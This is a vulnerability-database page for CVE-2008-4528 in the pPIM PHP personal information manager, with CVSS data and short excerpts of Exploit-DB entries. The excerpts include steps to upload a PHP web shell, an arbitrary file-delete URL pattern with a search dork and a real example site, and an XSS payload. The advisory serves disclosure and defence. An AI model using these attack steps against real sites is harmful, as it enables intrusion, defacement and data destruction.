CVE-2008-4528
published 2008-10-09CVE-2008-4528: Directory traversal vulnerability in notes.php in Phlatline's Personal Information Manager (pPIM) 1.01 allows remote attackers to include and execute arbitrary…
PriorityP345high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
2.55%
83.1th percentile
Directory traversal vulnerability in notes.php in Phlatline's Personal Information Manager (pPIM) 1.01 allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the id parameter in an edit action.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| phlatline | personal_information_manager | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
pPIM 1.0 - Multiple Vulnerabilities
exploitdb·2009-02-25
CVE-2008-4528 pPIM 1.0 - Multiple Vulnerabilities
pPIM 1.0 - Multiple Vulnerabilities
---
- -= pPIM Multiple Vulnerabilities =-
Version Tested: pPIM 1.0
Vendor notified
Full details can also be found at http://www.lampsecurity.org/node/18
Author: Justin C. Klein Keane
Description
pPIM (http://www.phlatline.org/index.php?page=prod-ppim) is a Personal
Information Management application written in PHP that can store
contacts (including their photos), events, links, notes, send and check
email, and upload files. pPIM came to my attention recently with the
publishing on Milw0rm of exploit code designed to facilitate remote
command execution (http://www.milw0rm.com/exploits/8093). As there is a
milw0rm exploit already posted it is likely malicious users are already
exploiting pPIM. I decided to have a closer look at pPIM and, quite
frankly
Exploit-DB
pPIM 1.01 - 'notes.php' Local File Inclusion
exploitdb·2008-10-04
CVE-2008-4528 pPIM 1.01 - 'notes.php' Local File Inclusion
pPIM 1.01 - 'notes.php' Local File Inclusion
---
# pPIM 1.01 (notes.php id) Local File Inclusion Vulnerability
# url: http://www.phlatline.org/docs/files/ppim.zip
#
# Author: JosS
# mail: sys-project[at]hotmail[dot]com
# site: http://spanish-hackers.com
# team: Spanish Hackers Team - [SHT]
#
# This was written for educational purpose. Use it at your own risk.
# Author will be not responsible for any damage.
description of vulnerability:
the variable 'id' has been not defined in code
and the variable 'id' is sent by the users.
vuln file: notes.php
vuln code:
x: >...
107: if (isset($_GET["mode"]))
{
if ($_GET["mode"]=="edit")
{
if (isset($_GET['id']))
{
$notefile = $_GET['id'];
if ($notefile == "new")
{
$title = "";
$notes = "";
}
else
{
$temp = "notes/" . $notefile;
req
Exploit-DB
pPIM 1.0 - Upload/Change Password
exploitdb·2008-08-11
CVE-2008-4528 pPIM 1.0 - Upload/Change Password
pPIM 1.0 - Upload/Change Password
---
Ppim <= 1.0 (upload/change password) Multiple Vulnerabilities
cript : Ppim v1.0
Download : http://scripts.ringsworld.com/organizers/ppim.zip
By Stack
Poc 1: change password
for change password go to this link
http://localhost/ppim/changepassword.php
writhe your password and confirm it
Poc 2 : upload
http://localhost/ppim/upload.php
you can upload you php shell in this link
after you go here
http://localhost/ppim/shell.php
# milw0rm.com [2008-08-11]
Exploit-DB
pPIM 1.0 - Arbitrary File Delete / Cross-Site Scripting
exploitdb·2008-08-10
CVE-2008-4528 pPIM 1.0 - Arbitrary File Delete / Cross-Site Scripting
pPIM 1.0 - Arbitrary File Delete / Cross-Site Scripting
---
##########################################################
#Author : BeyazKurt
#Contact : [email protected]
#
#Script : Ppim v1.0 [Bu ne bicim script adidir amk :D ]
#Download : http://scripts.ringsworld.com/organizers/ppim.zip
#
# D0rk : inurl:events.php?listallevents
#
# File Delete Vulnerability: upload.php
#
# Example:http://creawebs.com.mx/sistema/upload.php?mode=delfile&file=Creando Wiki.pptx
# Exploit:http://SITE.COM/upload.php?mode=delfile&file=FileName
#
# $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
#
# XSS Vulnerability: events.php
#
#[CODE]
# New Event";
# }
# ?>
#[/CODE]
#
#Exploit :
# events.php?mode=new&date=XSS CODE
# events.php?mode=new&date=">alert('XSS')
# -------------------------------
#
#
No writeups or analysis indexed.
http://securityreason.com/securityalert/4390http://www.securityfocus.com/bid/31571https://exchange.xforce.ibmcloud.com/vulnerabilities/45681https://www.exploit-db.com/exploits/6667http://securityreason.com/securityalert/4390http://www.securityfocus.com/bid/31571https://exchange.xforce.ibmcloud.com/vulnerabilities/45681https://www.exploit-db.com/exploits/6667
2008-10-09
Published